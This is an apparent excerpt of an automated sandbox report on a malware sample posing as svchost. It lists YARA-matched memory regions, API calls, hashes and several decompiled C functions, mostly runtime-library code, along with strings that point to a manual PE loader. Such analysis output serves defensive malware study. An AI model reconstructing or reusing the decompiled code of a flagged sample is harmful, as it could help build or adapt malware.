                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD59D9F
                                                • _free.LIBCMT ref: 6FD59DB2
                                                • _free.LIBCMT ref: 6FD59DC3
                                                • _free.LIBCMT ref: 6FD59DD4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 54789527d874aaac016276583b7f95d20497e8379f9c0cc632f7a6296688f450
                                                • Instruction ID: 53ade8bca6acdeb8c6414ad37840712986a8ec3f0b9e30461a4636b24376cbd2
                                                • Opcode Fuzzy Hash: 54789527d874aaac016276583b7f95d20497e8379f9c0cc632f7a6296688f450
                                                • Instruction Fuzzy Hash: F4F03AF5404B249BEF429F68A9408683B61B71A734B0C1606F5109B3E8D730B831CFB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A2D22 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 039A2D40
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039A2D52
                                                • _free.LIBCMT ref: 039A2D65
                                                • _free.LIBCMT ref: 039A2D76
                                                • _free.LIBCMT ref: 039A2D87
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 82b21d0d8df629f8a48e9d94fad86488a9e2dad89b1bbad330510ede0780e065
                                                • Instruction ID: d02ed212b3d8ffb2e5d098f3c527bc19068bbeeec99b011a5e419f0b4daec6da
                                                • Opcode Fuzzy Hash: 82b21d0d8df629f8a48e9d94fad86488a9e2dad89b1bbad330510ede0780e065
                                                • Instruction Fuzzy Hash: 97F05E7A83CB24CBCA12FF69B850845BB64B789A90304470AF4816E36EC77588129FD4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03996CF0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 03996D12
                                                • IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 03996D41
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996542
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996564
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996578
                                                Strings
                                                • [-] Invalid address of relocations, xrefs: 03996EE5
                                                • [-] Invalid address of relocations block, xrefs: 03996ECF
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID: [-] Invalid address of relocations$[-] Invalid address of relocations block
                                                • API String ID: 2080902951-3620647445
                                                • Opcode ID: 8e115a0acc3940c1b506c464801da7ae48a65a4e7938f26760dac6d0bed149ae
                                                • Instruction ID: 4635e796d5ed3eedbf9e7175dbd63d2414e65d3d85842d4b07b0941b8b0b39b7
                                                • Opcode Fuzzy Hash: 8e115a0acc3940c1b506c464801da7ae48a65a4e7938f26760dac6d0bed149ae
                                                • Instruction Fuzzy Hash: 4651C876E0021A9FEF10DEDCD88079DF3B9AF846A4F19407AD404A7201E732ED218755
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03999E93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 148COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: H_prolog3_
                                                • String ID:
                                                • API String ID: 2427045233-3916222277
                                                • Opcode ID: 50098093bd811a7eb60ce2a477e00263097a1961a62e6397ccd291092fe90975
                                                • Instruction ID: 81b821de139166554be7e25d48843c841f2618130f5b66cc5c12ac2d4b8aa1c1
                                                • Opcode Fuzzy Hash: 50098093bd811a7eb60ce2a477e00263097a1961a62e6397ccd291092fe90975
                                                • Instruction Fuzzy Hash: ED516235A1020A9FEF24DF9CD4909EEF7B9FF4A350F18495EE542AB240DB31A984CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5D954 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E6FD5D954(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t34 =  *0x6fd68008; // 0xc92c5105
				_v8 = _t34 ^ _t69;
				E6FD58DF3(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6FD5599E(_v8 ^ _t69, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6FD57920(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6FD5D2C6(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6FD59FEE(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6FD5FCD0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}





















                                                0x6fd5d95c
                                                0x6fd5d963
                                                0x6fd5d96f
                                                0x6fd5d974
                                                0x6fd5d979
                                                0x6fd5d97e
                                                0x6fd5d981
                                                0x6fd5d983
                                                0x6fd5d983
                                                0x6fd5d988
                                                0x6fd5d9a1
                                                0x6fd5d9a7
                                                0x6fd5d9ac
                                                0x6fd5da4b
                                                0x6fd5da4f
                                                0x6fd5da54
                                                0x6fd5da54
                                                0x6fd5da70
                                                0x6fd5da70
                                                0x6fd5d9b2
                                                0x6fd5d9b5
                                                0x6fd5d9ba
                                                0x6fd5d9be
                                                0x6fd5da0a
                                                0x6fd5da0c
                                                0x6fd5da0e
                                                0x6fd5da13
                                                0x6fd5da2a
                                                0x6fd5da32
                                                0x6fd5da42
                                                0x6fd5da42
                                                0x6fd5da32
                                                0x6fd5da44
                                                0x6fd5da45
                                                0x00000000
                                                0x6fd5da4a
                                                0x6fd5d9c0
                                                0x6fd5d9c5
                                                0x6fd5d9c7
                                                0x6fd5d9c9
                                                0x6fd5d9c9
                                                0x6fd5d9d1
                                                0x6fd5d9ee
                                                0x6fd5d9f8
                                                0x6fd5d9fd
                                                0x00000000
                                                0x00000000
                                                0x6fd5d9ff
                                                0x6fd5da05
                                                0x6fd5da05
                                                0x00000000
                                                0x6fd5da05
                                                0x6fd5d9d5
                                                0x6fd5d9d9
                                                0x6fd5d9de
                                                0x6fd5d9e2
                                                0x00000000
                                                0x00000000
                                                0x6fd5d9e4
                                                0x00000000

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 6FD5D9A1
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6FD5DA2A
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6FD5DA3C
                                                • __freea.LIBCMT ref: 6FD5DA45
                                                  • Part of subcall function 6FD59FEE: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6FD5DAC8,00000001,00000000,?,6FD5BCF0,00000001,00000004,00000000,00000001,?,?,6FD59BAA), ref: 6FD5A020
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                • String ID:
                                                • API String ID: 573072132-0
                                                • Opcode ID: 182cb247431ec356843fa5c667a223d0ea9dcd2501d3101e2066ca67bfde14dd
                                                • Instruction ID: 4e2839b06af6c95566b3e0565763e102e8cb2f9a7e6e95fd291bd68377e64a89
                                                • Opcode Fuzzy Hash: 182cb247431ec356843fa5c667a223d0ea9dcd2501d3101e2066ca67bfde14dd
                                                • Instruction Fuzzy Hash: EB31AD72A0424AABDF15CFA4CC40EEF7BA6EB51714F044229EC14DB290E735E964CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A9FC6 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,039A58EB,?,00000000,?,00000001,?,00000000,00000001,039A58EB,00000000), ref: 039AA013
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 039AA09C
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,039A17C4,?), ref: 039AA0AE
                                                • __freea.LIBCMT ref: 039AA0B7
                                                  • Part of subcall function 039A4899: RtlAllocateHeap.NTDLL(00000000,039920FE,73B76490), ref: 039A48CB
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 9e1d244e5854a20216e0092634487daf4333007fde3f03870cfdc2128e35baad
                                                • Instruction ID: 1552ebf95d653e6dc19ee16a025ce88b352b1d273eb5660707574aca11c31657
                                                • Opcode Fuzzy Hash: 9e1d244e5854a20216e0092634487daf4333007fde3f03870cfdc2128e35baad
                                                • Instruction Fuzzy Hash: E931E172A0062AABDF24DF69DC44DAFBBA9EB41350F084229EC05DB250E735CD50DBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5A3FF Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E6FD5A3FF(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6fd6b280 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6fd62098 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xc92c5106
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                0x6fd5a404
                                                0x6fd5a408
                                                0x6fd5a40f
                                                0x6fd5a413
                                                0x6fd5a421
                                                0x6fd5a437
                                                0x6fd5a43b
                                                0x6fd5a464
                                                0x6fd5a466
                                                0x6fd5a46a
                                                0x6fd5a46d
                                                0x6fd5a46d
                                                0x6fd5a473
                                                0x6fd5a475
                                                0x00000000
                                                0x6fd5a476
                                                0x6fd5a43d
                                                0x6fd5a446
                                                0x6fd5a455
                                                0x6fd5a448
                                                0x6fd5a44b
                                                0x6fd5a451
                                                0x6fd5a451
                                                0x6fd5a459
                                                0x00000000
                                                0x6fd5a45b
                                                0x6fd5a45e
                                                0x6fd5a460
                                                0x00000000
                                                0x6fd5a460
                                                0x6fd5a459
                                                0x6fd5a415
                                                0x6fd5a41a
                                                0x00000000

                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,6FD59013,00000000,00000000,?,6FD5A3A6,6FD59013,00000000,00000000,00000000,?,6FD5A5A3,00000006,FlsSetValue), ref: 6FD5A431
                                                • GetLastError.KERNEL32(?,6FD5A3A6,6FD59013,00000000,00000000,00000000,?,6FD5A5A3,00000006,FlsSetValue,6FD62550,6FD62558,00000000,00000364,?,6FD5B1DC), ref: 6FD5A43D
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6FD5A3A6,6FD59013,00000000,00000000,00000000,?,6FD5A5A3,00000006,FlsSetValue,6FD62550,6FD62558,00000000), ref: 6FD5A44B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 0f1198a42a4a4fb51c6269b0922523578f8eba7cf733d368033fe7eb597ea5b4
                                                • Instruction ID: 909f635bd380b969a8bd61f2e6cc5921ffb93b146f87cd936cdcdfd811a91198
                                                • Opcode Fuzzy Hash: 0f1198a42a4a4fb51c6269b0922523578f8eba7cf733d368033fe7eb597ea5b4
                                                • Instruction Fuzzy Hash: F101D436655732ABDF514BB88C48A667798AF06BB1B140620F95AD7140DA24F82186F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A4F71 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,03997F07,00000000,00000000,?,039A4F18,03997F07,00000000,00000000,00000000,?,039A5183,00000006,FlsSetValue), ref: 039A4FA3
                                                • GetLastError.KERNEL32(?,039A4F18,03997F07,00000000,00000000,00000000,?,039A5183,00000006,FlsSetValue,039B9164,039B916C,00000000,00000364,?,039A5FB4), ref: 039A4FAF
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,039A4F18,03997F07,00000000,00000000,00000000,?,039A5183,00000006,FlsSetValue,039B9164,039B916C,00000000), ref: 039A4FBD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: dce4a34d454c8452541d3240ea609670b294a150773cf494c588e7a6be0fec16
                                                • Instruction ID: 619695f85fe33e60b151d058fff183dc7fe6cb398dd0a8ca4986586cdcec7824
                                                • Opcode Fuzzy Hash: dce4a34d454c8452541d3240ea609670b294a150773cf494c588e7a6be0fec16
                                                • Instruction Fuzzy Hash: A0017B36609A329BCB20DA6FAC04E777B9CEF097E17140B20F906EB341E760D400CAE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03991D30 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4a45a8b47b19f59e2bd87932a2e1d2c03182355c1adcf0de4aa0dfe7951f195
                                                • Instruction ID: 3871008c217b02aeec52d28cb0addc692e0c33c424fe1760bfa0a85ef1c59289
                                                • Opcode Fuzzy Hash: d4a45a8b47b19f59e2bd87932a2e1d2c03182355c1adcf0de4aa0dfe7951f195
                                                • Instruction Fuzzy Hash: 23F05CBB5007070AFE28F3FC8941B6E729C2E501E8B1C077FE42ACE190FB21D45581AA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AF235 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,039AF490,?,00000050,?,?,?,?,?), ref: 039AF310
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ACP$OCP
                                                • API String ID: 0-711371036
                                                • Opcode ID: 0a2d644652813c842525d100ca534cfea67873924b4c4c9fbf19573b9ae860d4
                                                • Instruction ID: 8c1c879685bb0128bdd9063d7ed4eadc027c39d6d85f9534da41fa22fe58d10b
                                                • Opcode Fuzzy Hash: 0a2d644652813c842525d100ca534cfea67873924b4c4c9fbf19573b9ae860d4
                                                • Instruction Fuzzy Hash: 7121956AA00900A6DB34CAAD9D0579B72AE9B54BD4B5A4764DD07D7104F732D900C3D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03998FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 03998FFC
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0399900A
                                                  • Part of subcall function 0399C8FB: RaiseException.KERNEL32(?,?,?,03998FCF,73B75870,73B76490,73BCF7E0,?,?,?,?,?,03998FCF,?,039BE8EC), ref: 0399C95A
                                                Strings
                                                • invalid random_device value, xrefs: 03999029
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionException@8RaiseThrowstd::invalid_argument::invalid_argument
                                                • String ID: invalid random_device value
                                                • API String ID: 4038826145-3926945683
                                                • Opcode ID: f2c1232e66005123f2f9aa0d28e705e9e8f071f008cc27e94514388cbb6e27c4
                                                • Instruction ID: e120c5d34445f980b6a19ee1ca2b443e9903ee68afaf390b8a8b21b63eab0df4
                                                • Opcode Fuzzy Hash: f2c1232e66005123f2f9aa0d28e705e9e8f071f008cc27e94514388cbb6e27c4
                                                • Instruction Fuzzy Hash: E6E0C26D80430C7ADF04F7FDDD01CCD777C8A85100B40446AEA20E6441EB70AA0886E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A9749 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,5AA1B1C2,00000000,00000000,00000000,00000000,03995F94,03995F94,00000000,00000000,00000000,5AA1B1C2,00000000), ref: 039A97DF
                                                • GetLastError.KERNEL32 ref: 039A97ED
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,5AA1B1C2,00000000), ref: 039A9848
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1717984340-0
                                                • Opcode ID: a226b8183e6c43b332c163e716ac62d58d9b4f91afdad2d859c477c514ff7e00
                                                • Instruction ID: dd50f3d9b7ce144dc011468680ecab24026574837f67be0611acbd27443535e8
                                                • Opcode Fuzzy Hash: a226b8183e6c43b332c163e716ac62d58d9b4f91afdad2d859c477c514ff7e00
                                                • Instruction Fuzzy Hash: 9641E935A04A0AAFDF25DF6DC844A7ABBBCFF41350F1943A9E8599B191DB318901C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD54F00 Relevance: 5.1, APIs: 4, Instructions: 76memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD54F00(intOrPtr _a4, void** _a8, long* _a12) {
				void* __edi;
				intOrPtr _t18;
				long _t20;
				void* _t21;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int _t37;

				EnterCriticalSection(0x6fd6ac54);
				_t18 =  *0x6fd6ac70; // 0x6
				_t37 = 0;
				if(_t18 == 0) {
					L6:
					LeaveCriticalSection(0x6fd6ac54);
					return 0;
				} else {
					_t35 = _a4;
					_t34 =  *0x6fd6ac6c; // 0x30300a8
					while(1) {
						_t30 = 0;
						if(_t37 < _t18) {
							_t30 =  *((intOrPtr*)(_t34 + _t37 * 4));
						}
						if( *_t30 == _t35) {
							break;
						}
						_t37 = _t37 + 1;
						if(_t37 < _t18) {
							continue;
						} else {
							goto L6;
						}
						goto L18;
					}
					_t31 = 0;
					__eflags = _t37 - _t18;
					if(_t37 < _t18) {
						_t31 =  *((intOrPtr*)(_t34 + _t37 * 4));
					}
					__eflags =  *((intOrPtr*)(_t31 + 8));
					if( *((intOrPtr*)(_t31 + 8)) == 0) {
						goto L6;
					} else {
						_t32 = 0;
						__eflags = _t37 - _t18;
						if(_t37 < _t18) {
							_t32 =  *((intOrPtr*)(_t34 + _t37 * 4));
						}
						__eflags =  *((intOrPtr*)(_t32 + 4));
						if( *((intOrPtr*)(_t32 + 4)) <= 0) {
							goto L6;
						} else {
							_t33 = 0;
							__eflags = _t37 - _t18;
							if(_t37 < _t18) {
								_t33 =  *((intOrPtr*)(_t34 + _t37 * 4));
							}
							_t20 =  *(_t33 + 4);
							_t36 = _a12;
							 *_a12 = _t20;
							_t21 = LocalAlloc(0x40, _t20);
							_t28 = _a8;
							 *_a8 = _t21;
							E6FD57920(_a12, _t21, 0,  *_t36);
							_t23 = 0;
							__eflags = _t37 -  *0x6fd6ac70; // 0x6
							if(__eflags < 0) {
								_t26 =  *0x6fd6ac6c; // 0x30300a8
								_t23 =  *((intOrPtr*)(_t26 + _t37 * 4));
							}
							E6FD5FDE0( *_t28,  *((intOrPtr*)(_t23 + 8)),  *_t36);
							LeaveCriticalSection(0x6fd6ac54);
							return 1;
						}
					}
				}
				L18:
			}
















                                                0x6fd54f0a
                                                0x6fd54f10
                                                0x6fd54f15
                                                0x6fd54f19
                                                0x6fd54f36
                                                0x6fd54f3b
                                                0x6fd54f46
                                                0x6fd54f1b
                                                0x6fd54f1b
                                                0x6fd54f1e
                                                0x6fd54f24
                                                0x6fd54f24
                                                0x6fd54f28
                                                0x6fd54f2a
                                                0x6fd54f2a
                                                0x6fd54f2f
                                                0x00000000
                                                0x00000000
                                                0x6fd54f31
                                                0x6fd54f34
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd54f34
                                                0x6fd54f49
                                                0x6fd54f4b
                                                0x6fd54f4d
                                                0x6fd54f4f
                                                0x6fd54f4f
                                                0x6fd54f52
                                                0x6fd54f56
                                                0x00000000
                                                0x6fd54f58
                                                0x6fd54f58
                                                0x6fd54f5a
                                                0x6fd54f5c
                                                0x6fd54f5e
                                                0x6fd54f5e
                                                0x6fd54f61
                                                0x6fd54f65
                                                0x00000000
                                                0x6fd54f67
                                                0x6fd54f67
                                                0x6fd54f69
                                                0x6fd54f6b
                                                0x6fd54f6d
                                                0x6fd54f6d
                                                0x6fd54f70
                                                0x6fd54f73
                                                0x6fd54f7a
                                                0x6fd54f7c
                                                0x6fd54f82
                                                0x6fd54f85
                                                0x6fd54f8c
                                                0x6fd54f94
                                                0x6fd54f96
                                                0x6fd54f9c
                                                0x6fd54f9e
                                                0x6fd54fa3
                                                0x6fd54fa3
                                                0x6fd54fad
                                                0x6fd54fba
                                                0x6fd54fc6
                                                0x6fd54fc6
                                                0x6fd54f65
                                                0x6fd54f56
                                                0x00000000

                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC54), ref: 6FD54F0A
                                                • LeaveCriticalSection.KERNEL32(6FD6AC54), ref: 6FD54F3B
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 6FD54F7C
                                                • LeaveCriticalSection.KERNEL32(6FD6AC54), ref: 6FD54FBA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$AllocEnterLocal
                                                • String ID:
                                                • API String ID: 1168746000-0
                                                • Opcode ID: 4703906efb4f7ce67b7fe28db45f82afcb91c0e3c59926f70af82b45ace494d6
                                                • Instruction ID: a3e539a36a34d2ed79f23417d3745c2e0bd0989cac58fcfa8cf076334f98c9f9
